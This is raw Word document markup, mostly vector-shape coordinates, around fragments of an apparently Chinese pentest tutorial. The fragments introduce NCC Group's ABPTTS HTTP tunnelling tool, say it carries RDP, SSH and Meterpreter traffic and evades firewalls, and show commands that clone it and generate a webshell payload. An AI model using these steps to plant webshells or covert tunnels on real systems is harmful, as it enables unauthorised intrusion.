        <v:shape style="position:absolute;left:2650;top:15050;width:130;height:270" coordorigin="2650,15050" coordsize="130,270" path="m2665,15077l2665,15077,2665,15077,2665,15077,2665,15077,2665,15077,2665,15077,2665,15077,2665,15077,2665,15077,2665,15077,2665,15077,2665,15077,2665,15077,2665,15077,2666,15077,2666,15077,2666,15077,2666,15077,2666,15077,2666,15077,2666,15077,2666,15077,2666,15077,2666,15077,2666,15077,2666,15077,2667,15077,2667,15077,2667,15077,2667,15077,2667,15077,2667,15077,2668,15077,2668,15077,2668,15077,2668,15077,2669,15077,2669,15077,2669,15077,2670,15077,2670,15077,2670,15077,2671,15077,2671,15077,2671,15077,2672,15077,2672,15077,2673,15077,2673,15077,2674,15077,2674,15077,2675,15077,2675,15077,2676,15077,2677,15077,2677,15077,2678,15077,2679,15077,2679,15077,2680,15077,2681,15077,2682,15077,2682,15077,2683,15077,2684,15077,2685,15077,2686,15077,2687,15077,2688,15077,2689,15077,2690,15077,2691,15077,2692,15077,2693,15077,2694,15077,2695,15077,2697,15077,2698,15077,2699,15077,2700,15077,2702,15077,2703,15077,2705,15077,2706,15077,2708,15077,2709,15077,2711,15077,2712,15077,2714,15077,2716,15077,2717,15077,2719,15077,2721,15077,2723,15077,2725,15077,2726,15077,2728,15077,2730,15077,2732,15077,2734,15077,2737,15077,2739,15077,2741,15077,2743,15077,2745,15077,2748,15077,2750,15077,2753,15077,2755,15077,2758,15077,2760,15077,2763,15077,2765,15077,2768,15077,2771,15077,2774,15077,2777,15077,2779,15077,2782,15077,2785,15077,2785,15077,2785,15077,2785,15077,2785,15077,2785,15077,2785,15077,2785,15077,2785,15077,2785,15077,2785,15077,2785,15077,2785,15077,2785,15077,2785,15077,2785,15077,2785,15077,2785,15077,2785,15077,2785,15077,2785,15078,2785,15078,2785,15078,2785,15078,2785,15078,2785,15079,2785,15079,2785,15079,2785,15080,2785,15080,2785,15080,2785,15081,2785,15081,2785,15082,2785,15082,2785,15083,2785,15083,2785,15084,2785,15084,2785,15085,2785,15086,2785,15086,2785,15087,2785,15088,2785,15089,2785,15089,2785,15090,2785,15091,2785,15092,2785,15093,2785,15094,2785,15096,2785,15097,2785,15098,2785,15099,2785,15100,2785,15102,2785,15103,2785,15105,2785,15106,2785,15108,2785,15109,2785,15111,2785,15113,2785,15114,2785,15116,2785,15118,2785,15120,2785,15122,2785,15124,2785,15126,2785,15129,2785,15131,2785,15133,2785,15135,2785,15138,2785,15140,2785,15143,2785,15146,2785,15148,2785,15151,2785,15154,2785,15157,2785,15160,2785,15163,2785,15166,2785,15170,2785,15173,2785,15176,2785,15180,2785,15183,2785,15187,2785,15191,2785,15194,2785,15198,2785,15202,2785,15206,2785,15211,2785,15215,2785,15219,2785,15223,2785,15228,2785,15233,2785,15237,2785,15242,2785,15247,2785,15252,2785,15257,2785,15262,2785,15267,2785,15273,2785,15278,2785,15284,2785,15289,2785,15295,2785,15301,2785,15307,2785,15313,2785,15319,2785,15325,2785,15332,2785,15332,2785,15332,2785,15332,2785,15332,2785,15332,2785,15332,2785,15332,2785,15332,2785,15332,2785,15332,2785,15332,2785,15332,2785,15332,2785,15332,2785,15332,2785,15332,2785,15332,2785,15332,2785,15332,2785,15332,2785,15332,2785,15332,2785,15332,2785,15332,2784,15332,2784,15332,2784,15332,2784,15332,2784,15332,2784,15332,2783,15332,2783,15332,2783,15332,2783,15332,2783,15332,2782,15332,2782,15332,2782,15332,2781,15332,2781,15332,2781,15332,2780,15332,2780,15332,2780,15332,2779,15332,2779,15332,2778,15332,2778,15332,2778,15332,2777,15332,2776,15332,2776,15332,2775,15332,2775,15332,2774,15332,2774,15332,2773,15332,2772,15332,2772,15332,2771,15332,2770,15332,2769,15332,2768,15332,2768,15332,2767,15332,2766,15332,2765,15332,2764,15332,2763,15332,2762,15332,2761,15332,2760,15332,2759,15332,2758,15332,2757,15332,2755,15332,2754,15332,2753,15332,2752,15332,2750,15332,2749,15332,2748,15332,2746,15332,2745,15332,2743,15332,2742,15332,2740,15332,2738,15332,2737,15332,2735,15332,2733,15332,2732,15332,2730,15332,2728,15332,2726,15332,2724,15332,2722,15332,2720,15332,2718,15332,2716,15332,2714,15332,2712,15332,2710,15332,2708,15332,2705,15332,2703,15332,2701,15332,2698,15332,2696,15332,2693,15332,2691,15332,2688,15332,2685,15332,2683,15332,2680,15332,2677,15332,2674,15332,2671,15332,2668,15332,2665,15332,2665,15332,2665,15332,2665,15332,2665,15332,2665,15332,2665,15332,2665,15332,2665,15332,2665,15332,2665,15332,2665,15332,2665,15332,2665,15331,2665,15331,2665,15331,2665,15331,2665,15331,2665,15331,2665,15331,2665,15331,2665,15331,2665,15330,2665,15330,2665,15330,2665,15330,2665,15329,2665,15329,2665,15329,2665,15328,2665,15328,2665,15328,2665,15327,2665,15327,2665,15326,2665,15326,2665,15325,2665,15325,2665,15324,2665,15323,2665,15323,2665,15322,2665,15321,2665,15321,2665,15320,2665,15319,2665,15318,2665,15317,2665,15316,2665,15315,2665,15314,2665,15313,2665,15312,2665,15310,2665,15309,2665,15308,2665,15307,2665,15305,2665,15304,2665,15302,2665,15301,2665,15299,2665,15297,2665,15296,2665,15294,2665,15292,2665,15290,2665,15288,2665,15286,2665,15284,2665,15282,2665,15280,2665,15278,2665,15275,2665,15273,2665,15270,2665,15268,2665,15265,2665,15263,2665,15260,2665,15257,2665,15254,2665,15251,2665,15248,2665,15245,2665,15242,2665,15239,2665,15235,2665,15232,2665,15229,2665,15225,2665,15221,2665,15218,2665,15214,2665,15210,2665,15206,2665,15202,2665,15198,2665,15194,2665,15189,2665,15185,2665,15180,2665,15176,2665,15171,2665,15166,2665,15161,2665,15156,2665,15151,2665,15146,2665,15141,2665,15136,2665,15130,2665,15125,2665,15119,2665,15113,2665,15107,2665,15101,2665,15095,2665,15089,2665,15083,2665,15077e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:150.500pt;margin-top:752.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3010,15050" coordsize="130,270">
        <v:shape style="position:absolute;left:3010;top:15050;width:130;height:270" coordorigin="3010,15050" coordsize="130,270" path="m3026,15077l3026,15077,3026,15077,3026,15077,3026,15077,3026,15077,3026,15077,3026,15077,3026,15077,3026,15077,3026,15077,3026,15077,3026,15077,3026,15077,3026,15077,3026,15077,3026,15077,3026,15077,3026,15077,3026,15077,3026,15077,3026,15077,3026,15077,3026,15077,3026,15077,3027,15077,3027,15077,3027,15077,3027,15077,3027,15077,3027,15077,3027,15077,3028,15077,3028,15077,3028,15077,3028,15077,3029,15077,3029,15077,3029,15077,3029,15077,3030,15077,3030,15077,3030,15077,3031,15077,3031,15077,3032,15077,3032,15077,3032,15077,3033,15077,3033,15077,3034,15077,3034,15077,3035,15077,3036,15077,3036,15077,3037,15077,3037,15077,3038,15077,3039,15077,3039,15077,3040,15077,3041,15077,3042,15077,3043,15077,3043,15077,3044,15077,3045,15077,3046,15077,3047,15077,3048,15077,3049,15077,3050,15077,3051,15077,3052,15077,3053,15077,3054,15077,3056,15077,3057,15077,3058,15077,3059,15077,3061,15077,3062,15077,3063,15077,3065,15077,3066,15077,3068,15077,3069,15077,3071,15077,3072,15077,3074,15077,3076,15077,3077,15077,3079,15077,3081,15077,3083,15077,3085,15077,3087,15077,3089,15077,3091,15077,3093,15077,3095,15077,3097,15077,3099,15077,3101,15077,3103,15077,3106,15077,3108,15077,3110,15077,3113,15077,3115,15077,3118,15077,3120,15077,3123,15077,3126,15077,3128,15077,3131,15077,3134,15077,3137,15077,3140,15077,3143,15077,3146,15077,3146,15077,3146,15077,3146,15077,3146,15077,3146,15077,3146,15077,3146,15077,3146,15077,3146,15077,3146,15077,3146,15077,3146,15077,3146,15077,3146,15077,3146,15077,3146,15077,3146,15077,3146,15077,3146,15077,3146,15078,3146,15078,3146,15078,3146,15078,3146,15078,3146,15079,3146,15079,3146,15079,3146,15080,3146,15080,3146,15080,3146,15081,3146,15081,3146,15082,3146,15082,3146,15083,3146,15083,3146,15084,3146,15084,3146,15085,3146,15086,3146,15086,3146,15087,3146,15088,3146,15089,3146,15089,3146,15090,3146,15091,3146,15092,3146,15093,3146,15094,3146,15096,3146,15097,3146,15098,3146,15099,3146,15100,3146,15102,3146,15103,3146,15105,3146,15106,3146,15108,3146,15109,3146,15111,3146,15113,3146,15114,3146,15116,3146,15118,3146,15120,3146,15122,3146,15124,3146,15126,3146,15129,3146,15131,3146,15133,3146,15135,3146,15138,3146,15140,3146,15143,3146,15146,3146,15148,3146,15151,3146,15154,3146,15157,3146,15160,3146,15163,3146,15166,3146,15170,3146,15173,3146,15176,3146,15180,3146,15183,3146,15187,3146,15191,3146,15194,3146,15198,3146,15202,3146,15206,3146,15211,3146,15215,3146,15219,3146,15223,3146,15228,3146,15233,3146,15237,3146,15242,3146,15247,3146,15252,3146,15257,3146,15262,3146,15267,3146,15273,3146,15278,3146,15284,3146,15289,3146,15295,3146,15301,3146,15307,3146,15313,3146,15319,3146,15325,3146,15332,3146,15332,3146,15332,3146,15332,3146,15332,3146,15332,3146,15332,3146,15332,3146,15332,3146,15332,3146,15332,3146,15332,3145,15332,3145,15332,3145,15332,3145,15332,3145,15332,3145,15332,3145,15332,3145,15332,3145,15332,3145,15332,3145,15332,3145,15332,3145,15332,3145,15332,3144,15332,3144,15332,3144,15332,3144,15332,3144,15332,3144,15332,3143,15332,3143,15332,3143,15332,3143,15332,3143,15332,3142,15332,3142,15332,3142,15332,3141,15332,3141,15332,3141,15332,3140,15332,3140,15332,3140,15332,3139,15332,3139,15332,3138,15332,3138,15332,3137,15332,3137,15332,3136,15332,3136,15332,3135,15332,3134,15332,3134,15332,3133,15332,3132,15332,3132,15332,3131,15332,3130,15332,3129,15332,3129,15332,3128,15332,3127,15332,3126,15332,3125,15332,3124,15332,3123,15332,3122,15332,3121,15332,3120,15332,3119,15332,3118,15332,3117,15332,3116,15332,3114,15332,3113,15332,3112,15332,3110,15332,3109,15332,3108,15332,3106,15332,3105,15332,3103,15332,3102,15332,3100,15332,3099,15332,3097,15332,3095,15332,3094,15332,3092,15332,3090,15332,3088,15332,3086,15332,3084,15332,3083,15332,3081,15332,3079,15332,3076,15332,3074,15332,3072,15332,3070,15332,3068,15332,3065,15332,3063,15332,3061,15332,3058,15332,3056,15332,3053,15332,3051,15332,3048,15332,3045,15332,3043,15332,3040,15332,3037,15332,3034,15332,3031,15332,3029,15332,3026,15332,3026,15332,3026,15332,3026,15332,3026,15332,3026,15332,3026,15332,3026,15332,3026,15332,3026,15332,3026,15332,3026,15332,3026,15332,3026,15331,3026,15331,3026,15331,3026,15331,3026,15331,3026,15331,3026,15331,3026,15331,3026,15331,3026,15330,3026,15330,3026,15330,3026,15330,3026,15329,3026,15329,3026,15329,3026,15328,3026,15328,3026,15328,3026,15327,3026,15327,3026,15326,3026,15326,3026,15325,3026,15325,3026,15324,3026,15323,3026,15323,3026,15322,3026,15321,3026,15321,3026,15320,3026,15319,3026,15318,3026,15317,3026,15316,3026,15315,3026,15314,3026,15313,3026,15312,3026,15310,3026,15309,3026,15308,3026,15307,3026,15305,3026,15304,3026,15302,3026,15301,3026,15299,3026,15297,3026,15296,3026,15294,3026,15292,3026,15290,3026,15288,3026,15286,3026,15284,3026,15282,3026,15280,3026,15278,3026,15275,3026,15273,3026,15270,3026,15268,3026,15265,3026,15263,3026,15260,3026,15257,3026,15254,3026,15251,3026,15248,3026,15245,3026,15242,3026,15239,3026,15235,3026,15232,3026,15229,3026,15225,3026,15221,3026,15218,3026,15214,3026,15210,3026,15206,3026,15202,3026,15198,3026,15194,3026,15189,3026,15185,3026,15180,3026,15176,3026,15171,3026,15166,3026,15161,3026,15156,3026,15151,3026,15146,3026,15141,3026,15136,3026,15130,3026,15125,3026,15119,3026,15113,3026,15107,3026,15101,3026,15095,3026,15089,3026,15083,3026,15077e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:450.500pt;margin-top:752.500pt;width:12.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="9010,15050" coordsize="250,270">
        <v:shape style="position:absolute;left:9010;top:15050;width:250;height:270" coordorigin="9010,15050" coordsize="250,270" path="m9029,15077l9029,15077,9029,15077,9029,15077,9029,15077,9029,15077,9029,15077,9029,15077,9029,15077,9029,15077,9029,15077,9029,15077,9029,15077,9029,15077,9029,15077,9029,15077,9029,15077,9029,15077,9029,15077,9029,15077,9030,15077,9030,15077,9030,15077,9030,15077,9030,15077,9031,15077,9031,15077,9031,15077,9031,15077,9032,15077,9032,15077,9032,15077,9033,15077,9033,15077,9034,15077,9034,15077,9035,15077,9035,15077,9036,15077,9036,15077,9037,15077,9038,15077,9038,15077,9039,15077,9040,15077,9041,15077,9042,15077,9042,15077,9043,15077,9044,15077,9045,15077,9046,15077,9047,15077,9049,15077,9050,15077,9051,15077,9052,15077,9054,15077,9055,15077,9056,15077,9058,15077,9059,15077,9061,15077,9063,15077,9064,15077,9066,15077,9068,15077,9070,15077,9071,15077,9073,15077,9075,15077,9077,15077,9080,15077,9082,15077,9084,15077,9086,15077,9089,15077,9091,15077,9094,15077,9096,15077,9099,15077,9102,15077,9104,15077,9107,15077,9110,15077,9113,15077,9116,15077,9119,15077,9122,15077,9126,15077,9129,15077,9132,15077,9136,15077,9140,15077,9143,15077,9147,15077,9151,15077,9155,15077,9159,15077,9163,15077,9167,15077,9171,15077,9175,15077,9180,15077,9184,15077,9189,15077,9194,15077,9198,15077,9203,15077,9208,15077,9213,15077,9218,15077,9223,15077,9229,15077,9234,15077,9240,15077,9245,15077,9251,15077,9257,15077,9263,15077,9269,15077,9269,15077,9269,15077,9269,15077,9269,15077,9269,15077,9269,15077,9269,15077,9269,15077,9269,15077,9269,15077,9269,15077,9269,15077,9269,15077,9269,15077,9269,15077,9269,15077,9269,15077,9269,15077,9269,15077,9269,15078,9269,15078,9269,15078,9269,15078,9269,15078,9269,15079,9269,15079,9269,15079,9269,15080,9269,15080,9269,15080,9269,15081,9269,15081,9269,15082,9269,15082,9269,15083,9269,15083,9269,15084,9269,15084,9269,15085,9269,15086,9269,15086,9269,15087,9269,15088,9269,15089,9269,15089,9269,15090,9269,15091,9269,15092,9269,15093,9269,15094,9269,15096,9269,15097,9269,15098,9269,15099,9269,15100,9269,15102,9269,15103,9269,15105,9269,15106,9269,15108,9269,15109,9269,15111,9269,15113,9269,15114,9269,15116,9269,15118,9269,15120,9269,15122,9269,15124,9269,15126,9269,15129,9269,15131,9269,15133,9269,15135,9269,15138,9269,15140,9269,15143,9269,15146,9269,15148,9269,15151,9269,15154,9269,15157,9269,15160,9269,15163,9269,15166,9269,15170,9269,15173,9269,15176,9269,15180,9269,15183,9269,15187,9269,15191,9269,15194,9269,15198,9269,15202,9269,15206,9269,15211,9269,15215,9269,15219,9269,15223,9269,15228,9269,15233,9269,15237,9269,15242,9269,15247,9269,15252,9269,15257,9269,15262,9269,15267,9269,15273,9269,15278,9269,15284,9269,15289,9269,15295,9269,15301,9269,15307,9269,15313,9269,15319,9269,15325,9269,15332,9269,15332,9269,15332,9269,15332,9269,15332,9269,15332,9269,15332,9269,15332,9269,15332,9269,15332,9269,15332,9269,15332,9268,15332,9268,15332,9268,15332,9268,15332,9268,15332,9268,15332,9268,15332,9268,15332,9268,15332,9268,15332,9267,15332,9267,15332,9267,15332,9267,15332,9266,15332,9266,15332,9266,15332,9266,15332,9265,15332,9265,15332,9264,15332,9264,15332,9264,15332,9263,15332,9263,15332,9262,15332,9261,15332,9261,15332,9260,15332,9260,15332,9259,15332,9258,15332,9257,15332,9257,15332,9256,15332,9255,15332,9254,15332,9253,15332,9252,15332,9251,15332,9250,15332,9249,15332,9247,15332,9246,15332,9245,15332,9244,15332,9242,15332,9241,15332,9239,15332,9238,15332,9236,15332,9235,15332,9233,15332,9231,15332,9230,15332,9228,15332,9226,15332,9224,15332,9222,15332,9220,15332,9218,15332,9215,15332,9213,15332,9211,15332,9209,15332,9206,15332,9204,15332,9201,15332,9198,15332,9196,15332,9193,15332,9190,15332,9187,15332,9184,15332,9181,15332,9178,15332,9175,15332,9172,15332,9168,15332,9165,15332,9161,15332,9158,15332,9154,15332,9150,15332,9147,15332,9143,15332,9139,15332,9135,15332,9130,15332,9126,15332,9122,15332,9117,15332,9113,15332,9108,15332,9104,15332,9099,15332,9094,15332,9089,15332,9084,15332,9079,15332,9074,15332,9068,15332,9063,15332,9058,15332,9052,15332,9046,15332,9040,15332,9035,15332,9029,15332,9029,15332,9029,15332,9029,15332,9029,15332,9029,15332,9029,15332,9029,15332,9029,15332,9029,15332,9029,15332,9029,15332,9029,15332,9029,15331,9029,15331,9029,15331,9029,15331,9029,15331,9029,15331,9029,15331,9029,15331,9029,15331,9029,15330,9029,15330,9029,15330,9029,15330,9029,15329,9029,15329,9029,15329,9029,15328,9029,15328,9029,15328,9029,15327,9029,15327,9029,15326,9029,15326,9029,15325,9029,15325,9029,15324,9029,15323,9029,15323,9029,15322,9029,15321,9029,15321,9029,15320,9029,15319,9029,15318,9029,15317,9029,15316,9029,15315,9029,15314,9029,15313,9029,15312,9029,15310,9029,15309,9029,15308,9029,15307,9029,15305,9029,15304,9029,15302,9029,15301,9029,15299,9029,15297,9029,15296,9029,15294,9029,15292,9029,15290,9029,15288,9029,15286,9029,15284,9029,15282,9029,15280,9029,15278,9029,15275,9029,15273,9029,15270,9029,15268,9029,15265,9029,15263,9029,15260,9029,15257,9029,15254,9029,15251,9029,15248,9029,15245,9029,15242,9029,15239,9029,15235,9029,15232,9029,15229,9029,15225,9029,15221,9029,15218,9029,15214,9029,15210,9029,15206,9029,15202,9029,15198,9029,15194,9029,15189,9029,15185,9029,15180,9029,15176,9029,15171,9029,15166,9029,15161,9029,15156,9029,15151,9029,15146,9029,15141,9029,15136,9029,15130,9029,15125,9029,15119,9029,15113,9029,15107,9029,15101,9029,15095,9029,15089,9029,15083,9029,1507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7"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ABPTTS简</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="16"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>介：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133" w:firstLine="483"/>
      </w:pP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ABPTTS是NCC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Group在2016年blackhat推出的一款将TCP流量通过HTTP/HTTPS进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行流量转发，在目</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>前云主机的大环境中，发挥了比较重要的作用，可以通过脚本进行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RDP,SSH,Meterpreter的交互与连接。也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意味着这样可以建立一个通过80端口得流量出站来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逃避防</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>火墙。与其它http隧道不同的是，abptts是全加密。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2016年blackha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t介绍：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4"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="double" w:color="003783"/>
        </w:rPr>
        <w:t>https://www.blackhat.com/us-16/arsenal.html#a-black-path-to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="003783"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="double" w:color="003783"/>
        </w:rPr>
        <w:t>ward-the-sun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Githu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="383838"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>b：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8"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="double" w:color="003783"/>
        </w:rPr>
        <w:t>https:/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="003783"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="double" w:color="003783"/>
        </w:rPr>
        <w:t>/github.com/nccgroup/ABPTTS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5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>安装与生成payl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="383838"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>oad：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git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clone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https://github.com/nccgroup/ABPTTS.git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Cloning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into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59800"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'ABPTTS'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remote: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Enumerating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objects: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50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done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remote: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Total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delta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reused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delta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pack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reused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Unpacking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objects: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50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50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done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7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pip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install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pycrypto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Requirement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already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satisfied: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pycrypto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usr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lib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python2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7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dist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pac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kages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2.6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8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cd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ABPTTS/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8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~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ABPTTS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="6e7f8f"/>
          <w:spacing w:val="13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ls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abpttsclient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abpttsfactory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py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ABPTTS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Manual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pdf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data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libabptts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py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icense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txt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README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settings_overlays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template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ABPTTS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="6e7f8f"/>
          <w:spacing w:val="11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python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abpttsfactory.py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webshell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28.131919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‐‐‐===[[[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Black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Path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Toward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Sun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]]]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===‐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‐‐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24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28.131954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‐‐==[[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11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Factory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12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]]==‐‐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24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28.131965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Ben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Lincoln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NCC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Group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28.131979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Version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1.0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2016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07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30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28.132706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Output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files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will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created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"/root/AB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PT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TS/webshell"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354.653pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10402,0" coordsize="0,7093">
        <v:shape style="position:absolute;left:10402;top:0;width:0;height:7093" coordorigin="10402,0" coordsize="0,7093" path="m10402,0l10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,1,10402,2,10402,3,10402,4,10402,5,10402,7,10402,9,10402,11,10402,14,10402,17,10402,20,10402,24,10402,28,10402,33,10402,38,10402,44,10402,51,10402,58,10402,65,10402,73,10402,82,10402,92,10402,102,10402,113,10402,125,10402,137,10402,151,10402,165,10402,180,10402,196,10402,213,10402,230,10402,249,10402,269,10402,290,10402,311,10402,334,10402,358,10402,383,10402,409,10402,437,10402,465,10402,495,10402,526,10402,558,10402,591,10402,626,10402,662,10402,700,10402,739,10402,779,10402,821,10402,864,10402,909,10402,955,10402,1003,10402,1052,10402,1103,10402,1155,10402,1210,10402,1265,10402,1323,10402,1382,10402,1443,10402,1506,10402,1571,10402,1637,10402,1705,10402,1775,10402,1847,10402,1921,10402,1997,10402,2075,10402,2155,10402,2236,10402,2320,10402,2406,10402,2494,10402,2584,10402,2677,10402,2771,10402,2868,10402,2967,10402,3068,10402,3171,10402,3277,10402,3385,10402,3496,10402,3608,10402,3723,10402,3841,10402,3961,10402,4084,10402,4209,10402,4336,10402,4466,10402,4599,10402,4734,10402,4872,10402,5013,10402,5156,10402,5302,10402,5450,10402,5602,10402,5756,10402,5913,10402,6073,10402,6236,10402,6401,10402,6570,10402,6741,10402,6915,10402,7093e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:48.500pt;width:449.500pt;height:33.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,970" coordsize="8990,670">
        <v:shape style="position:absolute;left:1490;top:970;width:8990;height:670" coordorigin="1490,970" coordsize="8990,6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1000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1000l1517,1000,1517,1000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8,10484,1927,10484,1936,10484,1946,10484,1955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8,1517,1927,1517,1936,1517,1946,1517,1955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2,1510,2693,1510,2685,1510,2677,1510,2668,1510,2660,1510,2651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7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7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32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,3530" coordsize="8990,650">
        <v:shape style="position:absolute;left:1490;top:3530;width:8990;height:650" coordorigin="1490,3530" coordsize="8990,6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2,10484,3552,10484,3552,10484,3552,10484,3553,10484,3553,10484,3553,10484,3554,10484,3554,10484,3555,10484,3555,10484,3556,10484,3557,10484,3558,10484,3558,10484,3559,10484,3560,10484,3561,10484,3562,10484,3563,10484,3565,10484,3566,10484,3567,10484,3569,10484,3570,10484,3572,10484,3574,10484,3575,10484,3577,10484,3579,10484,3581,10484,3583,10484,3586,10484,3588,10484,3591,10484,3593,10484,3596,10484,3599,10484,3602,10484,3605,10484,3608,10484,3611,10484,3614,10484,3618,10484,3622,10484,3626,10484,3629,10484,3634,10484,3638,10484,3642,10484,3647,10484,3651,10484,3656,10484,3661,10484,3666,10484,3671,10484,3677,10484,3682,10484,3688,10484,3694,10484,3700,10484,3706,10484,3712,10484,3719,10484,3726,10484,3733,10484,3740,10484,3747,10484,3754,10484,3762,10484,3770,10484,3778,10484,3786,10484,3794,10484,3803,10484,3812,10484,3821,10484,3830,10484,3839,10484,3849,10484,3859,10484,3869,10484,3879,10484,3890,10484,3900,10484,3911,10484,3922,10484,3934,10484,3945,10484,3957,10484,3969,10484,3982,10484,3994,10484,4007,10484,4020,10484,4033,10484,4047,10484,4060,10484,4075,10484,4089,10484,4103,10484,4118,10484,4133,10484,4149,10484,4164,10484,4180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5,1510,4195,1510,4195,1510,4195,1510,4195,1510,4194,1510,4194,1510,4193,1510,4193,1510,4193,1510,4192,1510,4191,1510,4191,1510,4190,1510,4189,1510,4189,1510,4188,1510,4187,1510,4186,1510,4185,1510,4184,1510,4182,1510,4181,1510,4180,1510,4178,1510,4177,1510,4175,1510,4173,1510,4172,1510,4170,1510,4168,1510,4166,1510,4163,1510,4161,1510,4159,1510,4156,1510,4154,1510,4151,1510,4148,1510,4145,1510,4142,1510,4139,1510,4136,1510,4132,1510,4129,1510,4125,1510,4121,1510,4117,1510,4113,1510,4109,1510,4105,1510,4100,1510,4096,1510,4091,1510,4086,1510,4081,1510,4076,1510,4070,1510,4065,1510,4059,1510,4053,1510,4047,1510,4041,1510,4035,1510,4028,1510,4021,1510,4014,1510,4007,1510,4000,1510,3993,1510,3985,1510,3977,1510,3969,1510,3961,1510,3953,1510,3944,1510,3935,1510,3926,1510,3917,1510,3908,1510,3898,1510,3888,1510,3878,1510,3868,1510,3857,1510,3847,1510,3836,1510,3825,1510,3813,1510,3802,1510,3790,1510,3778,1510,3765,1510,3753,1510,3740,1510,3727,1510,3714,1510,3700,1510,3686,1510,3672,1510,3658,1510,3644,1510,3629,1510,3614,1510,3598,1510,3583,1510,3567,1510,3551e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:176.500pt;width:1.500pt;height:33.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,3530" coordsize="30,670">
        <v:shape style="position:absolute;left:1490;top:3530;width:30;height:670" coordorigin="1490,3530" coordsize="30,670" path="m1517,3551l1517,3551,1517,3551,1517,3551,1517,3551,1517,3551,1517,3551,1517,3551,1517,3551,1517,3551,1517,3551,1517,3551,1517,3551,1517,3551,1517,3552,1517,3552,1517,3552,1517,3552,1517,3553,1517,3553,1517,3553,1517,3554,1517,3554,1517,3555,1517,3555,1517,3556,1517,3557,1517,3558,1517,3558,1517,3559,1517,3560,1517,3561,1517,3562,1517,3563,1517,3565,1517,3566,1517,3567,1517,3569,1517,3570,1517,3572,1517,3574,1517,3575,1517,3577,1517,3579,1517,3581,1517,3583,1517,3586,1517,3588,1517,3591,1517,3593,1517,3596,1517,3599,1517,3602,1517,3605,1517,3608,1517,3611,1517,3614,1517,3618,1517,3622,1517,3626,1517,3629,1517,3634,1517,3638,1517,3642,1517,3647,1517,3651,1517,3656,1517,3661,1517,3666,1517,3671,1517,3677,1517,3682,1517,3688,1517,3694,1517,3700,1517,3706,1517,3712,1517,3719,1517,3726,1517,3733,1517,3740,1517,3747,1517,3754,1517,3762,1517,3770,1517,3778,1517,3786,1517,3794,1517,3803,1517,3812,1517,3821,1517,3830,1517,3839,1517,3849,1517,3859,1517,3869,1517,3879,1517,3890,1517,3900,1517,3911,1517,3922,1517,3934,1517,3945,1517,3957,1517,3969,1517,3982,1517,3994,1517,4007,1517,4020,1517,4033,1517,4047,1517,4060,1517,4075